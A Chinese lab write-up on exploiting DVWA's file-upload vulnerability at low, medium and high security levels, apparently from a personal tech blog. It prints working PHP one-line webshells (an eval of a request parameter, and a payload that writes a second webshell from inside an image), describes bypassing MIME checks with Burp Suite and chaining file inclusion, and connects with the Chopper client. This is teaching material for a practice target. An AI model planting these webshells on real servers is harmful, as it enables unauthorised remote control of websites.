一、DVWA之Upload

文件上传漏洞渗透与防御

1.攻击渗透环境搭建

1.1测试渗透机 与 测试靶机

一、DVWA之Upload

(小插曲:主机ping不通虚拟机,虚拟机可以ping主机,重启VMnat8后解决)

1.2实验原理

一、DVWA之Upload

2.文件上传漏洞渗透及防御

2.1 Upload(Low)

要求上传文件:image
实际上传文件:shell1.php
它是一个php的一句话木马 <?php @eval($_REQUEST[123]); ?>
一、DVWA之Upload
由网页后端源码可知该上传过滤只判断是否有文件上传
一、DVWA之Upload
一、DVWA之Upload

操作:直接上传
结果:上传成功
通过chopper远程链接获得网站的webshell。
一、DVWA之Upload
一、DVWA之Upload

2.2 Upload(medium)

一、DVWA之Upload通过源码判断,对我们上传的文件MINE标识类型和文件大小做了限制。
解决方案:通过burpsuit拦截改包后上传。
一、DVWA之Upload
值得注意的是:REQUEST请求方法只可以在网页地址栏输入变量访问,POST则是可以使用像中国菜刀之类的工具连接。
一、DVWA之Upload

2.3 Upload(high)

图片木马,与文件包含漏洞重叠,用010editor在图片文件中写入一句话木马

(`<?fputs(fopen("shell5.php","w"),'<?php @eval($_POST['chopper']);?>')?>`)

后上传。
一、DVWA之Upload
上传后,访问静态文件并不会执行木马,配合file inclusion漏洞,执行一句话木马在/var/www/dvwa/vulnerabilities/fi目录下生成shell5.php,
一、DVWA之Upload
执行完毕,通过菜刀链接即可。

上一篇:【Dvwa】Dvwa连接phpMyAdmin,在线管理并查看Dvwa后台数据库


下一篇:Cocos2d-X学习——Android移植,使用第三方库.so被删掉问题